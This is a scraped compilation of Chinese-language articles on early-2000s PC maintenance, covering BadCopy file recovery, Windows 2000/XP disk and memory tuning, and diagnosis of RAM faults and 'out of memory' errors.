采用BadCopy的恢复模式：Rescue Corrupted Files。这种模式适合存储介质的部分损坏，也就是说在读盘的时候仍然可以读出，只是部分文件无法读取。如果存储介质损坏严重，根本无法读出，即使你选择Rescue Lost Files－Mode #2方式恢复，软件也会提示你损坏严重，建议选择另一种恢复模式，见前面“文件已经被删除或者光盘被严重损坏已经完全不可读“。

出现的第一个窗口，左边的恢复来源中选择“Other Media &Storage”，然后在盘符中选择U盘所在的盘符I。这种方法也可以用于挽回其它盘符如硬盘中的数据。如图7-2-7 。

  图7-2-7 选择被恢复的存储介质

出现第二个窗口，中间的文件框列出了当前I盘中所有的文件，选择那个你无法读出的文件名，在“Recovery Option”中选择“Max Data”，单击“Next”，如图7-2-8。

  图7-2-8 选择修复相关的设置

出现第三个窗口，显示当前的恢复进程，如图7-2-9。

         图7-2-9 修复进程

出现第四个窗口，显示所有恢复回来的数据。如图7-2-10，单击“Next”。

         图7-2-10 显示修复的数据

出现第五个窗口，一个一个地选择恢复回来的文件，分别保存到你选择好的位置。如图7-2-11，单击“Next”。

         图7-2-11 选择文件夹保存被修复的文件

7）出现第六个窗口，开始保存，如果是试用版，则无法保存，很遗憾！保存结束，关闭窗口。


Win2000 硬盘/内存完美优化

《一键清理系统垃圾》

Win2000 硬盘/内存完美优化

前言

硬盘和内存子系统的优化对于许多使用win2000的人来说，或许有点遥远。Windows2000由于其强健的稳定性和极好的速度成为了商业应用的首选操作系统。而对于商业应用系统来说，是不是每一个人都要懂怎么去提高系统性能呢？很多时候，能完成工作已经很不错了，谁还有多余的时间来优化一下系统？再说，通常商业应用的电脑操作者对系统和硬件的认识都不多，这一切，使得大多数的Win2000系统没有被设置成最优化。我们这里讲的是做为客户机的Win2000系统，抛开了做为服务器系统的Windows2000不谈，我们甚至要把原来已在你电脑上打开的各项无用的网络服务都删去，以保证最大限度地对性能进行优化。

最后值得注意的是，你必须确认你获得了你使用的WinNT系统的最高权限，并用该用户等级登陆并进行下述修改，因为我们发现以系统其它用户权限登陆的话或许会使某些设定不能生效。所以在修改前请确定你是用Administrator身份登陆是很重要的。

后写式缓存

后写式缓存，顾名思义，其实就是把应该立刻写入磁盘上的数据先存放到系统内存中（因为内存的速度比所有的磁盘系统都要快得多，所以系统一会儿就认为数据已经存储完了），但其实是系统在磁盘空闲的时候才一部分一部分的把剩下没写完的数据写到磁盘上。因此，开启后写式缓存对提升系统性能非常明显。但要注意，如果有时候你的系统在非正常关机之后，某些数据可能会丢失。这在普通用途的电脑上几乎没什么影响，但如果你在用某些担任重要任务的服务器，我劝你还是打消使用这个功能的打算（但现在很多重要的服务器使用的都是SCSI硬盘，根本就不用开这个功能，所以大家也不用太担心了）

开启后写式缓存的方法是打开win2000的系统设置面板，然后选择你要打开硬盘的属性面板，对后写式缓存打上个钩就可以了。在开启了这一功能以后，系统必须重启才能使功能有效。

直接内存存取

DMA(Direct memory Acess直接内存存取）要比PIO工作模式高级得多，通过磁盘和内存的直接存取操作，一方面最大限度减少了CPU的介入操作，第二方面则大大提升了系统的磁盘性能。现在的磁盘系统一般都是使用UDMA规范的，市面上销售的硬盘有使用UDMA 33/66/100接口规范的。对应的，UDMA66的硬盘就需要有支持UDMA66接口的芯片组（也可以说是主板）的支持，否则系统只能是以UDMA33来工作。最新的UDMA规范UDMA100就需要使用Intel的815e(ep)芯片组或者是VIA的686b（北桥芯片）才能提供有效的支持。对于win2k系统来说，要比使用win9x操作系统好多了。因为DMA模式就是win2k默认的磁盘工作方式，而win9x还要在磁盘属性面板那里手动打开。

但不辛的是，Win2k默认的DMA模式只支持UDMA33，为了获得支持你UDMA66，甚至是更新的UDMA100的DMA工作模式，你还必须手动调整一下。这就需要稍微操作一下win2k的注册表

你可以在开始菜单运行regedit

进入到一个表，然后你需要查找一个像如下的项：

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0000

然后输入一个新的键值叫EnableUDMA66，并把其值设置为1(0就是关闭）,存盘退出后，你必须从新开机才能使用新的设定。

对于使用UDMA100硬盘的朋友来说，你要走运多了，现在无论是Intel的还是VIA的，都会为自己支持UDMA100的芯片组推出UDMA驱动的补丁程序，通常这个程序是很傻瓜化的，按运行后等安装完成了，再开一次机就是。使用了相应的UDMA模式最大的好处是能降低CPU的占用率，并且使一些新式的硬盘能够发挥最大的数据传输率（简单点说，就是速度啦）。


电脑综合诊治之内存故障详解

《一键清理系统垃圾》

电脑综合诊治之内存故障详解

一、开机无显示
    由于内存条原因出现此类故障一般是因为内存条与主板内存插槽接触不良造成，只要用橡皮擦来回擦试其金手指部位即可解决问题（不要用酒精等清洗），还有就是内存损坏或主板内存槽有问题也会造成此类故障。

    由于内存条原因造成开机无显示故障，主机扬声器一般都会长时间蜂鸣（针对Award Bios而言）

二、windows系统运行不稳定，经常产生非法错误

    出现此类故障一般是由于内存芯片质量不良或软件原因引起，如若确定是内存条原因只有更换一途。

三、windows注册表经常无故损坏，提示要求用户恢复

    此类故障一般都是因为内存条质量不佳引起，很难予以修复，唯有更换一途。

四、windows经常自动进入安全模式

    此类故障一般是由于主板与内存条不兼容或内存条质量不佳引起，常见于PC133内存用于某些不支持PC133内存条的主板上，可以尝试在CMOS设置内降低内存读取速度看能否解决问题，如若不行，那就只有更换内存条了。

五、随机性死机

    此类故障一般是由于采用了几种不同芯片的内存条，由于各内存条速度不同产生一个时间差从而导致死机，对此可以在CMOS设置内降低内存速度予以解决，否则，唯有使用同型号内存。还有一种可能就是内存条与主板不兼容，此类现象一般少见，另外也有可能是内存条与主板接触不良引起电脑随机性死机，此类现象倒是比较常见。

六、内存加大后系统资源反而降低

    此类现象一般是由于主板与内存不兼容引起，常见于PC133内存条用于某些不支持PC133内存条的主板上，即使系统重装也不能解决问题。

七、windows启动时，在载入高端内存文件himem.sys时系统提示某些地址有问题
    此问题一般是由于内存条的某些芯片损坏造成，解决方法可参见下面内存维修一法。

八、运行某些软件时经常出现内存不足的提示

    此现象一般是由于系统盘剩余空间不足造成，可以删除一些无用文件，多留一些空间即可，一般保持在300M左右为宜。

九、从硬盘引导安装windows进行到检测磁盘空间时，系统提示内存不足

    此类故障一般是由于用户在config.sys文件中加入了emm386.exe文件，只要将其屏蔽掉即可解决问题。

    其实，从硬盘以DOS方式引导安装windows的方法比较复杂而且速度慢，其一，必须要在硬盘上安装DOS文件，且还要配置config.sys和autoexec.bat文件，若文件配置不当，还会引发一系例不可预见的故障，对于初学者很不实用。其二，windows装入成功后，由于每次启动系统都会调入config.sys与autoexec.bat文件来驱动光驱，使得系统启动时间延长，如若屏蔽掉config.sys与autoexec.bat后，在windows下有时光驱又不能正常工作。

十、安装windows进行到系统配置时产生一个非法错误

    此类故障一般是由于内存条损坏造成，可以按内存维修一法来解决，如若不行，那就只有更换内存条了。

十一、启动windows时系统多次自动重新启动

    此类故障一般是由于内存条或电源质量有问题造成，当然，系统重新启动还有可能是CPU散热不良或其他人为故障造成，对此，唯有用排除法一步一步排除。

十二、内存维修一法

    出现上面几种故障后，倘若内存损坏或芯片质量不行，如条件不允许可以用烙铁将内存一边的各芯片卸下，看能否解决问题，如若不行再换卸另一边的芯片，直到成功为止（如此焊工只怕要维修手机的人方可达到）。当然，有条件用示波器检测那就事半功倍了），采用此法后，因为已将内存的一边芯片卸下，所以内存只有一半可用，例如，64M还有32M可用，为此，对于小容量内存就没有维修的必要了。


Windows XP 家庭用户内存优化指南

《一键清理系统垃圾》

Windows XP 家庭用户内存优化指南

2002-01-14　　　　　　 作者：

    好多人的家里只有一台计算机，主要用来上上网和玩游戏，并且配置也不是很高，如果装上了Windows XP，你的感觉可以用一个字来形容：慢！这就是我装完Windows体验版（Windows XP的中文名字）的一个体验。为什么这么慢呢，因为微软为了让你有新的体验，所以往Windows XP中加入了大量崭新的功能，比如：帮助中心，远程桌面，系统恢复，自动软件更新，Internet时间同步……，对于我而言，这些功能基本用不上，白白的耗了内存。要知道，大多人的机器仍然只有128M（虽然我的机器有384M的内存，但是我仍然讨厌无谓的浪费）！下面我们主要谈Windows XP的内存优化。

    我的Windows XP版本是Build2600，由于Windows XP是全球统一内码类型的产品，所以尽管它的界面是英文的，但是处理中文应然是游刃有余的。如果各位的Windows XP是中文版的，本文所介绍的步骤同样是可行的。

    首先让我们从系统属性对话窗开始

    我们将分别关闭“系统恢复”、“自动更新”和“远程桌面”功能。
      “系统恢复”虽然对经常犯错误的人有用，但是它会让你的硬盘处于高度繁忙的状态，你会发现你的硬盘总是忙个不停，因为Windows XP要记录的操作，以便日后恢复。如果你对自己有信心，那么就不要使用它，因为它可占不少内存。

    然后关闭“自动更新”功能。这个功能对一个时时刻刻都挂在网上的用户来说很适合，但是考虑到大多数家庭都是拨号上网，没有理由让这个功能长开着。何况，微软的升级也不是时时刻刻都有新的推出，我们每隔一段时间自己更新一下完全可以。我建议你将默认的自动升级改为确认升级方式，以便使你了解系统都做了些什么。

    接下来我们将“远程桌面”的功能也关闭。这个功能似曾相识，因为Windows 2000 Server就有一个Terminal Service来做同样的事情，我们可以从中发现微软的策略，在Windows 2000的时代，只有服务器版本的Windows 2000才带这个功能，而且名字也十分的专业，叫做终端服务，恐怕一般的用户不知道这个功能是干什么的。到了Windows XP，这个功能也被加到了Windows XP Home 和 Professional版本里来了，而且改了名字叫做“远程桌面”。顾名思义，这个功能就是让你可以让别人在另一台机器上访问你的桌面。可以说，在一个网络环境中，比如单位的局域网，这个功能很有用。比如你有问题了可以向同事求助，他可以不用到你的跟前，直接通过“远程桌面”来访问你的机器帮你解决问题。但是在家里面，通常只有一台计算机，这个功能就显得多余了，所以微软又赋予了它新的功能叫做“快速用户切换”，就是你可以不用注销你的用户让另一个人以其他用户的身份注册来使用你的计算机。我个人怀疑它的实用价值，大多数人使用计算机都没有用户的概念，计算机用就用呗，还分什么用户。所以我的意见还是关掉它，否则你不用它就等于白白浪费内存。

    下面我们再看看“系统属性”中的“高级”选项卡，首先是“性能”的设置

    在省缺的状况下，Windows XP是按照最佳的视觉效果来配置的，如果你觉得你的系统尤其是显示部分十分的缓慢的话，建议你改改，下面是我的配置：

    接下来看看“启动与恢复”的设置：

    尽管Windows XP十分的稳定，但是也有崩溃的时候。如果在你的系统崩溃是你发现你的硬盘使劲儿的响，那是因为Windows XP正在写DUMP文件呢，对我们来说，如果你不打算把这个文件寄给微软，那么它又有什么用呢？所以我的建议还是关闭：

最后来看看“错误报告”功能。

    这个功能可以在你的Windows XP发生错误的时候，系统自动收集一些错误资料然后发送给微软公司，以便其完善他们的操作系统。这个功能对于一个拨号上网的用户而言十分的不适合，因为谁会花着自己的钱同时浪费着自己的时间去发送这些十分巨大的而且只对微软公司有用的数据呢？如果这个功能对你没有用，那又何必让它占用着你的内存呢？

最后，我们来看看还有哪些多余的功能。安装图示进入系统的服务列表：

    如果你的家里没有打印机，你可以将“Printer Spooler”服务关闭掉。如果你没有定期执行的任务，将“Task Scheduler”服务关闭掉。对于大多人而言，“Remote Registry”同样没有用，也可以关闭掉。下面是经过上面所有优化后的服务列表，我将优化过的地方用红颜色的圆圈标记了出来：

    优化后，Windows XP启动后大约占用60M左右的内存：

    此外，大家看到这里我只关心每个应用程序的“虚拟内存”（VM Size）使用情况，而不是“内存使用”（Memory Usage）。原因是只有“虚拟内存”才被统计到“内存使用”（Commit Charge）数据中去，就是大家在状态栏看到的统计值。我们可以做一小试验来验证我的说法，我们启动WORD，记录一下它的内存使用和系统总的内存使用，然后最小化这个WORD，在检查一下它的内存使用和系统总的内存使用，结果如下：

    最小化之前的内存记录

    上图为最小化后的内存记录。

    不难发现，“MemoryUsage”随着WORD的最小化变小了，而“VM Size”没有变化，并且系统总的内存使用并没有随着WORD的最小化而变化。这就是为什么我只关心“VM Size”的原因。希望大家察看内存的时候能够注意一下，VM Size才是准确的数字。

    由于本文关注的是Windows XP下的系统优化，所以对一些大家耳熟能详的节约内存的方法，比如不使用壁纸，我就不写出来让大家浪费时间了。另外，大家可能会说，你把Windows XP的特色功能都关闭了，那还是Windows XP吗？其实这一点我也知道，不过鱼和熊掌不能兼得，如果你的机器配置很高档，如果你觉得你得Windows XP运行的不慢，你当然可以使用Windows XP的省缺配置了，毕竟这是微软推荐的使用方法嘛。不过，即便你关闭了我所提到的这些功能，Windows XP仍然有大量的新的功能等着你，比如崭新的资源管理器真的是十分的与众不同，所以，优化完的系统还是Windows XP ！


“内存不足”的解决方法

《一键清理系统垃圾》

“内存不足”的解决方法

    大家在应用电脑时一定都遇到过机器提示内存不足的现象吧，那么什么是内存不足，又该如何处理呢，下面我们就来讲一讲有关这方面的内容。

    所谓“内存不足”就是指在启动或运行DOS应用程序和Windows应用程序时，系统报“Out of memory"或“内存不足"的错误信息。“内存不足”是一种很常见的故障，运行DOS应用程序和Windows应用程序引起“内存不足”的原因不完全相同。

    一、DOS下的内存不足

    如果是在运行DOS应用程序时出现“ Out of memory”（内存不足）的故障，可按以下方法进行检查和处理：

    1、检查系统是否提供对扩充内存的支持，必须保证CONFIG.SYS文件中的EMM386.EXE命令中含有RAM参数，关于RAM参数的设置请参考相关文章，这里就不述叙；

    2、 如果故障仍存在，检查DOS内核程序与其它运行的应用程序是否兼容，某些程序是否占用了大量的常规内存，并作出相应的处理。

    举个例子：一次我在运行WPS 时，屏幕显示“内存不够”，系统无法运行。考虑到在运行WPS之前曾执行过一些其它程序，可能是这些程序没有完全从内存中退出，于是重新启动，运行金山汉字系统，WPS 编辑软件仍无法进入，用DOS 6.22的Mem命令查看内存，仅剩200KB左右的空间，且CHLIB文件占用主内存达255KB，即字库放在了常规内存中，而金山系统是应该可以自动使用扩展内存存放字库的，查看系统配置情况，在CONFIG.SYS中设有：

    DEVICE=C：\DOS\HIMEM.SYS
    DOS=HIGH

    这就是说，DOS内核程序调入扩展内存后，虽然扩大了可用主内存空间，但是由于扩展内存与金山系统发生冲突，以致汉字库无法载入扩展内存。解决的办法有两种：

    1、去掉DOS=HIGH设置，将DOS内核程序从扩展内存撤出，即可正常运行。

    2、将“/DEVICE=C：\DOS\HIMEM.SYS"改为“/DEVICE=C：\DOS\HIMEM.SYS/INT15=320"，因金山系统使用的是扩展内存的低端，这一区域若有其它程序驻留，字库就不能正常载入，利用INT15参数给系统先预留出一部分传统的扩展存储器(即不由XMS规范管理而由INT15直接使用的扩展存储器)，字库和DOS内核都可使用扩展内存了，这样设置之后，在金山汉字系统状态下可用的主内存空间可达512KB，比不设置时多出250KB左右。

    二、Windows中的内存不足

    如果在运行Windows应用程序时，出现“内存不足”的故障，可按下列方法进行检查和处理：

    1、首先应检查Windows的资源使用情况，如果资源占用较多，可用资源较少，打开新文件时会出现“内存不足"的问题。这时可以清理屏幕，减少窗口的数目，关闭不用的应用程序，包括TSR内存驻留程序，将Windows应用程序最小化为图标，如果问题只是在运行一特殊的应用程序时出现，则与应用软件销售商联系，可能是数据对象的管理不好所致；

    2、如果问题没有解决，清除或保存Clipboard(剪贴板)的内容，使用ControlPanel Desktop选项将墙纸(Wallpaper)设置为None；

    3、如问题仍存在，可用PIF编辑器编辑PIF文件，增大PIF文件中定义的MemoryRequirements：KB Required的值；在标准模式下，选择Prevent ProgramSwitch，该开关选项打开后，退出应用程序返回Windows；如果是386增强模式，则要将Display Usage设置成Full Screen(全屏幕方式)，将Execution设置为Exclusive，将Video memory设置为尽可能低的方式；

    4、 如果问题仍存在，则重新开机进入Windows系统，并且确保在“启动"图标中没有其它无关的应用软件同时启动运行，在WIN.INI文件中也没有Run或Load命令加载的任何无关的应用程序。

    在平时，出现“内存不足"的问题一般可以按以下办法处理。首先，退出那些不需要运行的应用程序，然后，再检查系统的可用资源为多少。如果可用资源大于30％，一般可以运行新的程序。当有多个应用程序在系统中运行时，可以退出一个，检查一次可用资源，如果某个应用程序在退出前后，可用资源的百分比没有变化，说明这个应用程序没有释放它所占用的资源。如果要收回这些没有释放的资源，只能退出Windows后，再重新进入Windows。为了确保在启动进入Windows时系统的可用资源足够，在“启动"图标中应该没有无关的应用软件同时启动运行，在WIN.INI文件中也没有由Run或Load命令加载的任何无关的应用程序，因为这些同时启动的无关应用程序可能已经占用了很多资源，使得要使用的应用程序无法运行。

    一般说来，经过这样处理，就不会出现“内存不足"的问题了。


解决内存出错

《一键清理系统垃圾》

解决内存出错

    使用Windows操作系统的人有时会遇到这样的错误信息：“0X????????指令引用的0x00000000内存，该内存不能written”，然后应用程序被关闭。如果去请教一些“高手”，得到的回答往往是“Windows就是这样不稳定”之类的义愤和不屑。其实，这个错误并不一定是Windows不稳定造成的。本文就来简单分析这种错误的常见原因。

    一、应用程序没有检查内存分配失败

    程序需要一块内存用以保存数据时，就需要调用操作系统提供的“功能函数”来申请，如果内存分配成功，函数就会将所新开辟的内存区地址返回给应用程序，应用程序就可以通过这个地址使用这块内存。这就是“动态内存分配”，内存地址也就是编程中的“指针”。

    内存不是永远都招之即来、用之不尽的，有时候内存分配也会失败。当分配失败时系统函数会返回一个0值，这时返回值“0”已不表示新启用的指针，而是系统向应用程序发出的一个通知，告知出现了错误。作为应用程序，在每一次申请内存后都应该检查返回值是否为0，如果是，则意味着出现了故障，应该采取一些措施挽救，这就增强了程序的“健壮性”。

    若应用程序没有检查这个错误，它就会按照“思维惯性”认为这个值是给它分配的可用指针，继续在之后的运行中使用这块内存。真正的0地址内存区保存的是计算机系统中最重要的“中断描述符表”，绝对不允许应用程序使用。在没有保护机制的操作系统下（如DOS），写数据到这个地址会导致立即死机，而在健壮的操作系统中，如Windows等，这个操作会马上被系统的保护机制捕获，其结果就是由操作系统强行关闭出错的应用程序，以防止其错误扩大。这时候，就会出现上述的“写内存”错误，并指出被引用的内存地址为“0x00000000”。

    内存分配失败故障的原因很多，内存不够、系统函数的版本不匹配等都可能有影响。因此，这种分配失败多见于操作系统使用很长时间后，安装了多种应用程序（包括无意中“安装”的病毒程序），更改了大量的系统参数和系统文件之后。

    二、应用程序由于自身BUG引用了不正常的内存指针

    在使用动态分配的应用程序中，有时会有这样的情况出现：程序试图读写一块“应该可用”的内存，但不知为什么，这个预料中可用的指针已经失效了。有可能是“忘记了”向操作系统要求分配，也可能是程序自己在某个时候已经注销了这块内存而“没有留意”等等。注销了的内存被系统回收，其访问权已经不属于该应用程序，因此读写操作也同样会触发系统的保护机制，企图“违法”的程序唯一的下场就是被操作终止运行，回收全部资源。计算机世界的法律还是要比人类有效和严厉得多啊！

    像这样的情况都属于程序自身的BUG，你往往可在特定的操作顺序下重现错误。无效指针不一定总是0，因此错误提示中的内存地址也不一定为“0x00000000”，而是其他随机数字。

    如果系统经常有所提到的错误提示，下面的建议可能会有帮助：

    1.查看系统中是否有木马或病毒。这类程序为了控制系统往往不负责任地修改系统，从而导致操作系统异常。平常应加强信息安全意识，对来源不明的可执行程序绝不好奇。

    2.更新操作系统，让操作系统的安装程序重新拷贝正确版本的系统文件、修正系统参数。有时候操作系统本身也会有BUG，要注意安装官方发行的升级程序。

    3.试用新版本的应用程序。


解决四例内存常见故障

《一键清理系统垃圾》

解决四例内存常见故障

    内存是电脑的核心部件之一，其重要性不言而喻。同时内存也是电脑故障的主要来源，内存故障带来的后果不容忽视。这里给大家分析几个典型的内存故障，希望大家从中能学到解决内存故障的思路和办法。

    1．内存条质量欠佳导致Windows安装出错

    故障现象：一台新配的兼容机，配置为：P4 1.8AGHz、i845G主板、Hynix 256MB DDR266内存条、希捷酷鱼5代60GB硬盘。硬盘分好区后安装Windows 98，在安装过程中复制系统文件时报错，按“取消”后可以跳过错误继续安装，但稍后再度报错，Windows系统安装不能完成。

    故障分析：由于故障发生在系统文件复制阶段，初步怀疑是安装光盘的问题，格式化硬盘并更换Windows 98安装光盘进行重装，故障依旧。故障疑点转移到硬盘和内存条身上，更换硬盘后故障仍然存在，排除硬盘发生故障的可能性；更换内存条后故障消失，最终确认导致Windows安装出错的祸首为劣质内存条。Windows 98安装时需要从光盘复制文件到硬盘，而内存作为系统数据交换的中转站，在这个过程中起了极其重要的作用。此例就是内存条质量不佳、不能稳定工作而导致系统文件复制出错。

    2．注册表频频出错祸起内存条

    故障现象：一台电脑配置为：PⅢ 550MHz（超频到731MHz）、SiS630主板、Hynix 192MB（128MB+64MB）SDRAM内存。使用一年多后系统变得不稳定，经常在开机进入Windows后出现注册表错误，提示需要恢复注册表。

    故障分析：刚开始时以为是操作系统不稳定，于是格式化硬盘。重装后问题也没有得到彻底解决，甚至变得更严重，有时甚至出现“Windows Protection Error”错误提示。由于CPU一直在超频状态下运行，初步怀疑故障源于CPU，把CPU降频后注册表出错的频率明显降低，更换了CPU后，故障现象并没有消失，依然不时出现。为彻底排除故障，使用替换法进行测试，最终发现罪魁祸首是那条64MB的内存条。该电脑长期在超频状态下运行，CPU和内存的时钟频率均为133MHz。那条64MB的内存条采用的是HY-7K的芯片，做工也较差，长期在133MHz外频下运行不堪重负，导致注册表频频出错。一些做工较差、参数较低的内存条也许可以在一段时间内超频工作，但长此下去往往会出现问题，引发系统故障，这是用户应该注意的问题。

    3．打磨过的内存条导致电脑无法开机

    故障现象：一台电脑配置为：PⅢ 800EB、VIA 694X主板、Hynix 128MB PC133内存条。添加了一条128MB的Hynix PC133内存条后，显示器黑屏，电脑无法正常开机，拔下该内存条后故障消失。

    故障分析：经过检查，发现新内存条并无问题，在别的电脑上可以正常使用，但只能工作在100MHz的外频下，根本无法在133MHz下使用。为使用该内存条，不得不在BIOS的内存设置项中设置异步工作模式。该内存条的芯片上的编号标志为“-75”，应该为PC133的内存条，但芯片上的字迹较为模糊，极有可能是从-7K或-7J的内存Remark(打磨)而来，自然无法在133MHz外频下工作。因此消费者在选购内存条的时候要注意别买到Remark的内存条。

    4．内存条不兼容导致容量不能正确识别

    故障现象：一台品牌机，配置为：PⅢ 800、i815E主板、Hynix 128MB内存条，后来添加了一条日立128MB内存条，但主板认出的内存总容量只有128MB。

    故障分析：经过测试，在该电脑上，两条内存可分别独立使用，但一起用时只能认出128MB，可知这两条内存条间存在兼容性问题，后来把新添加的内存条更换为采用Hynix芯片的内存条后故障得到解决。由于电气性能的差别，内存条之间有可能会有兼容性问题，该问题在不同品牌的内存条混插的环境下出现的几率较大。因此，使用两条或两条以上内存条时应该尽量选择相同品牌和型号的产品，这样可以最大限度地避免内存条不兼容的现象。如果无法购买到与原内存条相同的产品时，应尽量采用市场上口碑较好的品牌内存条，它们一般都经过严格的特殊匹配及兼容性测试，在元件、设计和质量上也能达到或超过行业标准。当然并不是所有的品牌内存条都具有良好的兼容性。

    因为内存条具有十分重要的地位，使用劣质内存条有时会出现意想不到的结果，因此建议用户尽量选购优质的品牌内存条。


论Windows server 2003中安全释放内存

《一键清理系统垃圾》

论Windows server 2003中安全释放内存

    经常看到有朋友在论坛上诉苦说需要释放内存，其实如果你安装了Windows 2003的话，那么并不需要寻求那些需要注册才能长久使用的第三方内存管理软件。

    因为Windows 2003已经自带了一个名为Empty.exe的小程序，它可以用来释放某些应用程序在占用大量内存时不能及时释放的那部分资源。

    与那些第三方软件内存管理软件不同的是， Empty.exe不会强迫系统全部释放资源，而是仅仅释放必要的资源，这样就不会加重硬盘的负担了。

    Empty.exe的使用相当简单，命令格式如下:

    Empty.exe pid(pid指进程的product id)

    或者是Empty.exe task-name(task-name指进程的名称)

    最后需要说明的是，Empty.exe仅仅能在Windows Server 2003中使用，Windows 2000/XP中就无缘使用了。


内存

《一键清理系统垃圾》

内存

[color=Green]内存是电脑中最重要的配件之一，它的作用毋庸置疑，那么内存最常见的故障都有哪些呢？ [/color]

[color=Red]常见故障一：开机无显示 [/color]
[color=Blue]内存条原因出现此类故障一般是因为内存条与主板内存插槽接触不良造成，只要用橡皮擦来回擦试其金手指部位即可解决问题（不要用酒精等清洗），还有就是内存损坏或主板内存槽有问题也会造成此类故障。
    由于内存条原因造成开机无显示故障，主机扬声器一般都会长时间蜂鸣（针对Award Bios而言）。
[/color]

[color=Red]常见故障二：Windows注册表经常无故损坏，提示要求用户恢复 [/color]
[color=Blue]此类故障一般都是因为内存条质量不佳引起，很难予以修复，唯有更换一途。 [/color]

[color=Red]常见故障三：Windows经常自动进入安全模式 [/color]
[color=Blue]此类故障一般是由于主板与内存条不兼容或内存条质量不佳引起，常见于高频率的内存用于某些不支持此频率内存条的主板上，可以尝试在CMOS设置内降低内存读取速度看能否解决问题，如若不行，那就只有更换内存条了。[/color]

[color=Red]常见故障四：随机性死机 [/color]
[color=Blue]此类故障一般是由于采用了几种不同芯片的内存条，由于各内存条速度不同产生一个时间差从而导致死
机，对此可以在CMOS设置内降低内存速度予以解决，否则，唯有使用同型号内存。还有一种可能就是内存条与主板不兼容，此类现象一般少见，另外也有可能是内存条与主板接触不良引起电脑随机性死机。[/color]

[color=Red]常见故障五：内存加大后系统资源反而降低 [/color]
[color=Blue]此类现象一般是由于主板与内存不兼容引起，常见于高频率的内存内存条用于某些不支持此频率的内存条的主板上，当出现这样的故障后你可以试着在COMS中将内存的速度设置得低一点试试。
[/color]

[color=Red]常见故障六：运行某些软件时经常出现内存不足的提示 [/color]
[color=Blue]此现象一般是由于系统盘剩余空间不足造成，可以删除一些无用文件，多留一些空间即可，一般保持在
300M左右为宜。 [/color]

[color=Red]常见故障七：从硬盘引导安装Windows进行到检测磁盘空间时，系统提示内存不足 [/color]
[color=Blue]此类故障一般是由于用户在config.sys文件中加入了emm386.exe文件，只要将其屏蔽掉即可解决问题。


内存导致的异常故障

《一键清理系统垃圾》

内存导致的异常故障

笔者一台兼容机，配置为华硕P3V133、赛扬300A OC 450MHz、64M HY PC100内存、MGA G200显卡。升级至PC133 128M之后出现故障，故障表现为第一次开机系统无任何反应，必须重新开机或者reset之后系统才能点亮，此后系统正常工作，关机一段时间之后，下次重新开机故障依旧。

    本来怀疑是显卡或者内存接触不良，重新安装之后故障依旧；又怀疑显卡或内存金手指氧化导致接触不良，清洁金手指后故障依旧。于是又怀疑是主板和机箱短路造成该故障，把主板从机箱内移出，故障仍然存在，看来机箱和主板并没有短路存在，并且采用排除法更换显卡和同样的内存条，故障仍然未能解决。看来故障原因并不是处在显卡或者内存上。

    一日偶然的机会，在超频处理器时因为频率设置过高导致机器无法点亮，在清除BIOS之后，却发现故障现象消失，看来BIOS设置与这个故障息息相关！

    于是按着昔日设置的习惯试着优化BIOS，发现将内存参数设置之后，系统就又出现了以前的故障！看来故障原因找到了。于是设置为CL=3，故障排除。笔者这个内存是内存降价的时候所购买，尽管支持PC133，但是CL参数却只能设置为3，设置为2时，尽管使用中也很稳定，但是正是这个原因导致了开机时的故障。

    尽管本例故障比较少见，但是从这个故障，我们可以看出，内存质量对于系统的稳定性有紧密的联系，特别是目前市面上的内存质量良莠不齐，很多用户忽略了CL这个重要的参数，希望本例故障能够让大家在选购时对内存的参数引起重视。

作者：小雷


内存故障处理

《一键清理系统垃圾》

内存故障处理

    启动系统或运行应用程序时，系统报：“error：unable to control A20 line”、“memory write/read failure”或报：“memory allocation error”等，这些问题都属内存出错故障，它与内存减少、内存不足及奇偶检验错误不同。
    系统报“内存出错”有三种情况，分别由不同原因造成。一是开机自检时报“内存出错”，引起该故障的原因主要是内存条或内存控制器的硬件故障；二是在CMOS中设置了启动系统时不自检1M以上内存，而在运行应用程序时系统报“内存出错”，引起该故障的原因可能是内存条或内存控制器的硬件故障，也可能是软件故障；三是开机自检通过，进入DOS或Windows平台，在运行应用程序时报“内存出错”，引起该故障的原因主要是软件故障。 </P><P>　　对于由软件故障造成的内存出错，可按下列步骤检查和处理： </P><P>　　1.如果是在DOS环境下运行应用程序时报“内存出错”，则怀疑是否是内存分配出错，检查DOS与运行的应用程序是否冲突，并作出相应的处理。一般可通过重新启动系统或重新编写系统配置文件来解决，对应用程序的问题则可通过相应的修改来解决。 </P><P>　　2.如果是在Windows环境下运行应用程序时报“内存出错”，则怀疑是否是由应用程序非法访问存储器造成的，一般可通过清除内存驻留程序，减少活动窗口，调整配置程序或重新安装系统和应用程序来解决。 </P><P>　　3.如果问题只是在运行一特殊的应用程序才出现，可能是由该软件造成的。 </P><P>　　4.用KILL或KV300＋检测系统是否带有病毒，有则杀毒。 </P><P>　　硬件故障造成的内存出错比较常见，CMOS设置错误、内存条接触不良、内存条安装组合错误、内存条硬件损坏、内存控制器出错等均会造成内存出错，一般可按下列步骤检查和处理： </P><P>　　1.由于开机自检即显示“内存出错”，首先进入CMOS设置，检查CMOS中关于内存条的参数设置是否正确，是否与内存条的配置情况相符；比如，如果设置的内存读写周期或内存读写等待时间小于内存条实际值，则应增大内存读写周期或者增加内存读写等待时间。 </P><P>　　2.如果故障仍存在，检查内存条与内存插座槽之间接触是否良好，并作出相应的处理。 </P><P>　　3.如果故障仍未排除，检查内存条的安装组合是否正确。一般主板的存储器安装插座分为几个体(Bank)，每个体中有二至四个存储器安装插座，可安装二至四个存储器条。由于72线的内存条一次可以提供32位有效数据（30线内存条已淘汰，在此不予讨论），对于Pentium类CPU，其数据线为64位，要一次能存取64位数据，就必须同时安装两个72线内存条，所以586级微机的主机板，一般必须按偶数安装72线内存条，即一次应安装2条或4条72线SIMM存储器条。如果主板上的内存条插座是168线的，由于168线的内存条一次就可以提供64位有效数据，所以只安装一条也能正常工作。安装内存条时应注意以下几点:</P><P>对大多数PC机来说,不能在同一个Bank内将容量不同的SIMM条混插在一起。很多PC机都可安装不同容量的SIMM条，但装在同一组Bank中的所有SIMM条必须具有相同的容量。 </P><P>　　．对于很多PC机来说，若把不同速度的SIMM条混插在一起，即使它们的容量相同，也会带来麻烦。例如，计算机中已有运行速度为60ns(纳秒)的16MB内存，如果在主板的空闲内存槽中再插入速度为70ns的SIMM条，系统就有可能会拒绝引导或在启动后不久就陷于崩溃。对于某些微机来说，若把速度低的SIMM条放至第一组，则可解决速度混合问题，计算机会按最低速度存取。 </P><P>　　